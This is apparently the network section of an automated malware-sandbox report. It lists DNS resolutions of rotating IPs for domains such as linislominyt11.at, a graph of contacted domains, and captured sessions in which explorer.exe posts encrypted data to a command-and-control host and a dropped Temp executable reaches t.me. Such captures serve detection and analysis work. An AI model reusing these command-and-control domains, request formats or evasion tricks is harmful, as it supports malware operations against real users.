Jun 29, 2022 23:11:45.979594946 CEST	8.8.8.8	192.168.2.3	0xdcee	No error (0)	linislominyt11.at		188.48.69.64	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:45.979594946 CEST	8.8.8.8	192.168.2.3	0xdcee	No error (0)	linislominyt11.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:45.979594946 CEST	8.8.8.8	192.168.2.3	0xdcee	No error (0)	linislominyt11.at		222.232.238.243	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:45.979594946 CEST	8.8.8.8	192.168.2.3	0xdcee	No error (0)	linislominyt11.at		1.248.122.240	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:45.979594946 CEST	8.8.8.8	192.168.2.3	0xdcee	No error (0)	linislominyt11.at		148.255.22.31	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:45.979594946 CEST	8.8.8.8	192.168.2.3	0xdcee	No error (0)	linislominyt11.at		37.34.248.24	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:47.935431004 CEST	8.8.8.8	192.168.2.3	0xca73	No error (0)	linislominyt11.at		195.158.3.162	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:47.935431004 CEST	8.8.8.8	192.168.2.3	0xca73	No error (0)	linislominyt11.at		196.200.111.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:47.935431004 CEST	8.8.8.8	192.168.2.3	0xca73	No error (0)	linislominyt11.at		190.117.75.91	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:47.935431004 CEST	8.8.8.8	192.168.2.3	0xca73	No error (0)	linislominyt11.at		188.48.69.64	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:47.935431004 CEST	8.8.8.8	192.168.2.3	0xca73	No error (0)	linislominyt11.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:47.935431004 CEST	8.8.8.8	192.168.2.3	0xca73	No error (0)	linislominyt11.at		222.232.238.243	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:47.935431004 CEST	8.8.8.8	192.168.2.3	0xca73	No error (0)	linislominyt11.at		1.248.122.240	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:47.935431004 CEST	8.8.8.8	192.168.2.3	0xca73	No error (0)	linislominyt11.at		148.255.22.31	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:47.935431004 CEST	8.8.8.8	192.168.2.3	0xca73	No error (0)	linislominyt11.at		37.34.248.24	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:47.935431004 CEST	8.8.8.8	192.168.2.3	0xca73	No error (0)	linislominyt11.at		211.53.230.67	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:50.814934015 CEST	8.8.8.8	192.168.2.3	0x6ffb	No error (0)	linislominyt11.at		211.53.230.67	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:50.814934015 CEST	8.8.8.8	192.168.2.3	0x6ffb	No error (0)	linislominyt11.at		195.158.3.162	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:50.814934015 CEST	8.8.8.8	192.168.2.3	0x6ffb	No error (0)	linislominyt11.at		196.200.111.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:50.814934015 CEST	8.8.8.8	192.168.2.3	0x6ffb	No error (0)	linislominyt11.at		190.117.75.91	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:50.814934015 CEST	8.8.8.8	192.168.2.3	0x6ffb	No error (0)	linislominyt11.at		188.48.69.64	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:50.814934015 CEST	8.8.8.8	192.168.2.3	0x6ffb	No error (0)	linislominyt11.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:50.814934015 CEST	8.8.8.8	192.168.2.3	0x6ffb	No error (0)	linislominyt11.at		222.232.238.243	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:50.814934015 CEST	8.8.8.8	192.168.2.3	0x6ffb	No error (0)	linislominyt11.at		1.248.122.240	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:50.814934015 CEST	8.8.8.8	192.168.2.3	0x6ffb	No error (0)	linislominyt11.at		148.255.22.31	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:50.814934015 CEST	8.8.8.8	192.168.2.3	0x6ffb	No error (0)	linislominyt11.at		37.34.248.24	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:51.932615995 CEST	8.8.8.8	192.168.2.3	0x90b6	No error (0)	amarillavida.com		206.221.182.74	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:55.160443068 CEST	8.8.8.8	192.168.2.3	0x3a70	No error (0)	linislominyt11.at		195.158.3.162	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:55.160443068 CEST	8.8.8.8	192.168.2.3	0x3a70	No error (0)	linislominyt11.at		196.200.111.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:55.160443068 CEST	8.8.8.8	192.168.2.3	0x3a70	No error (0)	linislominyt11.at		190.117.75.91	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:55.160443068 CEST	8.8.8.8	192.168.2.3	0x3a70	No error (0)	linislominyt11.at		188.48.69.64	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:55.160443068 CEST	8.8.8.8	192.168.2.3	0x3a70	No error (0)	linislominyt11.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:55.160443068 CEST	8.8.8.8	192.168.2.3	0x3a70	No error (0)	linislominyt11.at		222.232.238.243	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:55.160443068 CEST	8.8.8.8	192.168.2.3	0x3a70	No error (0)	linislominyt11.at		1.248.122.240	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:55.160443068 CEST	8.8.8.8	192.168.2.3	0x3a70	No error (0)	linislominyt11.at		148.255.22.31	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:55.160443068 CEST	8.8.8.8	192.168.2.3	0x3a70	No error (0)	linislominyt11.at		37.34.248.24	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:55.160443068 CEST	8.8.8.8	192.168.2.3	0x3a70	No error (0)	linislominyt11.at		211.53.230.67	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:58.506696939 CEST	8.8.8.8	192.168.2.3	0xd029	No error (0)	linislominyt11.at		211.53.230.67	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:58.506696939 CEST	8.8.8.8	192.168.2.3	0xd029	No error (0)	linislominyt11.at		195.158.3.162	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:58.506696939 CEST	8.8.8.8	192.168.2.3	0xd029	No error (0)	linislominyt11.at		196.200.111.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:58.506696939 CEST	8.8.8.8	192.168.2.3	0xd029	No error (0)	linislominyt11.at		190.117.75.91	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:58.506696939 CEST	8.8.8.8	192.168.2.3	0xd029	No error (0)	linislominyt11.at		188.48.69.64	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:58.506696939 CEST	8.8.8.8	192.168.2.3	0xd029	No error (0)	linislominyt11.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:58.506696939 CEST	8.8.8.8	192.168.2.3	0xd029	No error (0)	linislominyt11.at		222.232.238.243	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:58.506696939 CEST	8.8.8.8	192.168.2.3	0xd029	No error (0)	linislominyt11.at		1.248.122.240	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:58.506696939 CEST	8.8.8.8	192.168.2.3	0xd029	No error (0)	linislominyt11.at		148.255.22.31	A (IP address)	IN (0x0001)
Jun 29, 2022 23:11:58.506696939 CEST	8.8.8.8	192.168.2.3	0xd029	No error (0)	linislominyt11.at		37.34.248.24	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:04.666182995 CEST	8.8.8.8	192.168.2.3	0x2bdf	No error (0)	linislominyt11.at		211.53.230.67	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:04.666182995 CEST	8.8.8.8	192.168.2.3	0x2bdf	No error (0)	linislominyt11.at		195.158.3.162	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:04.666182995 CEST	8.8.8.8	192.168.2.3	0x2bdf	No error (0)	linislominyt11.at		196.200.111.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:04.666182995 CEST	8.8.8.8	192.168.2.3	0x2bdf	No error (0)	linislominyt11.at		190.117.75.91	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:04.666182995 CEST	8.8.8.8	192.168.2.3	0x2bdf	No error (0)	linislominyt11.at		188.48.69.64	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:04.666182995 CEST	8.8.8.8	192.168.2.3	0x2bdf	No error (0)	linislominyt11.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:04.666182995 CEST	8.8.8.8	192.168.2.3	0x2bdf	No error (0)	linislominyt11.at		222.232.238.243	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:04.666182995 CEST	8.8.8.8	192.168.2.3	0x2bdf	No error (0)	linislominyt11.at		1.248.122.240	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:04.666182995 CEST	8.8.8.8	192.168.2.3	0x2bdf	No error (0)	linislominyt11.at		148.255.22.31	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:04.666182995 CEST	8.8.8.8	192.168.2.3	0x2bdf	No error (0)	linislominyt11.at		37.34.248.24	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:06.344942093 CEST	8.8.8.8	192.168.2.3	0xfff1	No error (0)	linislominyt11.at		190.117.75.91	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:06.344942093 CEST	8.8.8.8	192.168.2.3	0xfff1	No error (0)	linislominyt11.at		188.48.69.64	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:06.344942093 CEST	8.8.8.8	192.168.2.3	0xfff1	No error (0)	linislominyt11.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:06.344942093 CEST	8.8.8.8	192.168.2.3	0xfff1	No error (0)	linislominyt11.at		222.232.238.243	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:06.344942093 CEST	8.8.8.8	192.168.2.3	0xfff1	No error (0)	linislominyt11.at		1.248.122.240	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:06.344942093 CEST	8.8.8.8	192.168.2.3	0xfff1	No error (0)	linislominyt11.at		148.255.22.31	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:06.344942093 CEST	8.8.8.8	192.168.2.3	0xfff1	No error (0)	linislominyt11.at		37.34.248.24	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:06.344942093 CEST	8.8.8.8	192.168.2.3	0xfff1	No error (0)	linislominyt11.at		211.53.230.67	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:06.344942093 CEST	8.8.8.8	192.168.2.3	0xfff1	No error (0)	linislominyt11.at		195.158.3.162	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:06.344942093 CEST	8.8.8.8	192.168.2.3	0xfff1	No error (0)	linislominyt11.at		196.200.111.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:15.069782019 CEST	8.8.8.8	192.168.2.3	0x5057	No error (0)	linislominyt11.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:15.069782019 CEST	8.8.8.8	192.168.2.3	0x5057	No error (0)	linislominyt11.at		222.232.238.243	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:15.069782019 CEST	8.8.8.8	192.168.2.3	0x5057	No error (0)	linislominyt11.at		1.248.122.240	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:15.069782019 CEST	8.8.8.8	192.168.2.3	0x5057	No error (0)	linislominyt11.at		148.255.22.31	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:15.069782019 CEST	8.8.8.8	192.168.2.3	0x5057	No error (0)	linislominyt11.at		37.34.248.24	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:15.069782019 CEST	8.8.8.8	192.168.2.3	0x5057	No error (0)	linislominyt11.at		211.53.230.67	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:15.069782019 CEST	8.8.8.8	192.168.2.3	0x5057	No error (0)	linislominyt11.at		195.158.3.162	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:15.069782019 CEST	8.8.8.8	192.168.2.3	0x5057	No error (0)	linislominyt11.at		196.200.111.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:15.069782019 CEST	8.8.8.8	192.168.2.3	0x5057	No error (0)	linislominyt11.at		190.117.75.91	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:15.069782019 CEST	8.8.8.8	192.168.2.3	0x5057	No error (0)	linislominyt11.at		188.48.69.64	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:16.562060118 CEST	8.8.8.8	192.168.2.3	0x9413	No error (0)	linislominyt11.at		195.158.3.162	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:16.562060118 CEST	8.8.8.8	192.168.2.3	0x9413	No error (0)	linislominyt11.at		196.200.111.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:16.562060118 CEST	8.8.8.8	192.168.2.3	0x9413	No error (0)	linislominyt11.at		190.117.75.91	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:16.562060118 CEST	8.8.8.8	192.168.2.3	0x9413	No error (0)	linislominyt11.at		188.48.69.64	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:16.562060118 CEST	8.8.8.8	192.168.2.3	0x9413	No error (0)	linislominyt11.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:16.562060118 CEST	8.8.8.8	192.168.2.3	0x9413	No error (0)	linislominyt11.at		222.232.238.243	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:16.562060118 CEST	8.8.8.8	192.168.2.3	0x9413	No error (0)	linislominyt11.at		1.248.122.240	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:16.562060118 CEST	8.8.8.8	192.168.2.3	0x9413	No error (0)	linislominyt11.at		148.255.22.31	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:16.562060118 CEST	8.8.8.8	192.168.2.3	0x9413	No error (0)	linislominyt11.at		37.34.248.24	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:16.562060118 CEST	8.8.8.8	192.168.2.3	0x9413	No error (0)	linislominyt11.at		211.53.230.67	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:19.442878962 CEST	8.8.8.8	192.168.2.3	0x3488	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:25.596867085 CEST	8.8.8.8	192.168.2.3	0x74a3	No error (0)	diewebseite.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:25.596867085 CEST	8.8.8.8	192.168.2.3	0x74a3	No error (0)	diewebseite.at		187.170.224.112	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:25.596867085 CEST	8.8.8.8	192.168.2.3	0x74a3	No error (0)	diewebseite.at		211.171.233.126	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:25.596867085 CEST	8.8.8.8	192.168.2.3	0x74a3	No error (0)	diewebseite.at		211.119.84.111	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:25.596867085 CEST	8.8.8.8	192.168.2.3	0x74a3	No error (0)	diewebseite.at		116.121.62.237	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:25.596867085 CEST	8.8.8.8	192.168.2.3	0x74a3	No error (0)	diewebseite.at		151.251.24.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:25.596867085 CEST	8.8.8.8	192.168.2.3	0x74a3	No error (0)	diewebseite.at		190.140.74.43	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:25.596867085 CEST	8.8.8.8	192.168.2.3	0x74a3	No error (0)	diewebseite.at		87.119.100.220	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:25.596867085 CEST	8.8.8.8	192.168.2.3	0x74a3	No error (0)	diewebseite.at		58.235.189.192	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:25.596867085 CEST	8.8.8.8	192.168.2.3	0x74a3	No error (0)	diewebseite.at		211.59.14.90	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:27.436638117 CEST	8.8.8.8	192.168.2.3	0xdcf1	No error (0)	diewebseite.at		211.119.84.111	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:27.436638117 CEST	8.8.8.8	192.168.2.3	0xdcf1	No error (0)	diewebseite.at		116.121.62.237	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:27.436638117 CEST	8.8.8.8	192.168.2.3	0xdcf1	No error (0)	diewebseite.at		151.251.24.5	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:27.436638117 CEST	8.8.8.8	192.168.2.3	0xdcf1	No error (0)	diewebseite.at		190.140.74.43	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:27.436638117 CEST	8.8.8.8	192.168.2.3	0xdcf1	No error (0)	diewebseite.at		87.119.100.220	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:27.436638117 CEST	8.8.8.8	192.168.2.3	0xdcf1	No error (0)	diewebseite.at		58.235.189.192	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:27.436638117 CEST	8.8.8.8	192.168.2.3	0xdcf1	No error (0)	diewebseite.at		211.59.14.90	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:27.436638117 CEST	8.8.8.8	192.168.2.3	0xdcf1	No error (0)	diewebseite.at		175.119.10.231	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:27.436638117 CEST	8.8.8.8	192.168.2.3	0xdcf1	No error (0)	diewebseite.at		187.170.224.112	A (IP address)	IN (0x0001)
Jun 29, 2022 23:12:27.436638117 CEST	8.8.8.8	192.168.2.3	0xdcf1	No error (0)	diewebseite.at		211.171.233.126	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

amarillavida.com

t.me

cykwgckuqp.net

linislominyt11.at

kkxkj.net

qgetqklgt.net

unkcndrk.net

ydqkvjmc.net

lawpnggnr.org

wjlmjplgy.org

phjdbb.com

meegrily.com

rfnvjmol.org

159.69.101.170

ymjfc.net

diewebseite.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49768	206.221.182.74	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49789	149.154.167.99	443	C:\Users\user\AppData\Local\Temp\7791.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49781	175.119.10.231	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:12:15.378344059 CEST	11935	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://meegrily.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 132 Host: linislominyt11.at
Jun 29, 2022 23:12:15.379147053 CEST	11935	OUT	Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 be 8a 14 62 cc d6 4f 96 94 a0 19 ca Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bOozS<bPFp,YL ^
Jun 29, 2022 23:12:16.519007921 CEST	12062	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:12:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49783	195.158.3.162	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:12:16.771123886 CEST	12063	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rfnvjmol.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: linislominyt11.at
Jun 29, 2022 23:12:16.771173954 CEST	12064	OUT	Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bf 8a 14 62 cd d6 4f 96 83 ad 5b ae Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bO[x98)s/h'46MW$lLj:8-/\8!^qq_G~g5
Jun 29, 2022 23:12:17.468589067 CEST	12105	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rfnvjmol.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: linislominyt11.at Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bf 8a 14 62 cd d6 4f 96 83 ad 5b ae e4 b9 1b dd 8e af 78 f5 be e8 c2 90 97 39 ae 0e 38 96 b1 29 73 e8 8c 03 15 2f f2 05 ef 68 27 96 ed 34 eb 36 4d 1b 57 b3 24 8b c2 f3 ba 85 d5 cb ca 06 6c 84 4c ad ed f5 9e 91 fb a1 6a 3a 38 fe a3 e0 2d b5 d7 a5 09 0b d5 ad f7 c4 f8 2f 5c ac b8 86 80 e7 38 21 5e 71 0b fb 82 71 5f 9d 47 a3 7e 67 8a cf 35 Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bO[x98)s/h'46MW$lLj:8-/\8!^qq_G~g5
Jun 29, 2022 23:12:18.171735048 CEST	12111	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rfnvjmol.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: linislominyt11.at Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bf 8a 14 62 cd d6 4f 96 83 ad 5b ae e4 b9 1b dd 8e af 78 f5 be e8 c2 90 97 39 ae 0e 38 96 b1 29 73 e8 8c 03 15 2f f2 05 ef 68 27 96 ed 34 eb 36 4d 1b 57 b3 24 8b c2 f3 ba 85 d5 cb ca 06 6c 84 4c ad ed f5 9e 91 fb a1 6a 3a 38 fe a3 e0 2d b5 d7 a5 09 0b d5 ad f7 c4 f8 2f 5c ac b8 86 80 e7 38 21 5e 71 0b fb 82 71 5f 9d 47 a3 7e 67 8a cf 35 Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bO[x98)s/h'46MW$lLj:8-/\8!^qq_G~g5
Jun 29, 2022 23:12:21.808659077 CEST	14104	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:12:19 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 ca b1 2f c6 d3 2e 39 af 7f 7e c2 63 a3 ed 1e a0 9b 62 be 81 4b d3 f3 a9 ab cb 37 22 85 1d 18 60 9a 10 db 16 a1 35 7c 17 ff 04 ee 6f 06 1f 7a ad 5d 08 93 2c 9b 4c 16 7b 61 ff c5 8e bd 94 f0 10 5a 24 ec f5 99 dc 66 06 2f e9 ee 08 a9 7f 32 83 bf 6c 13 d9 42 08 73 19 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 59 b6 b3 1a 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f e8 92 24 f2 4d c5 03 55 b3 a1 61 7e de f5 a9 75 19 17 7e 4f af 9a a5 54 ca a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f5 96 be 25 51 61 9f d4 3e 7c 88 28 c8 48 6b 01 bb 4a 9a 07 fd ec a5 9e 76 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 d5 58 ce 4f 13 79 82 ae 9c f7 79 4c 0d 68 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 a0 01 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 22 92 ff 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 6f 98 c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 e7 77 b5 1b 6f d3 cb 29 32 d2 e5 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 d3 c1 67 e4 a6 6d 13 9f 10 8d d0 b0 99 f9 9b 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 e5 ac 88 44 a9 b4 bb 4a 7a 17 28 d2 ee 3d 1f d0 a3 aa 7a 8f c4 67 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 bf 88 67 4a dc e5 7e 07 a6 70 d4 03 bb d7 98 76 6c 0f ca 82 fb 29 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 83 b2 27 70 10 7b 3a 1d f8 38 94 ae 88 c1 a4 da 33 25 3d da a9 c3 de c4 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 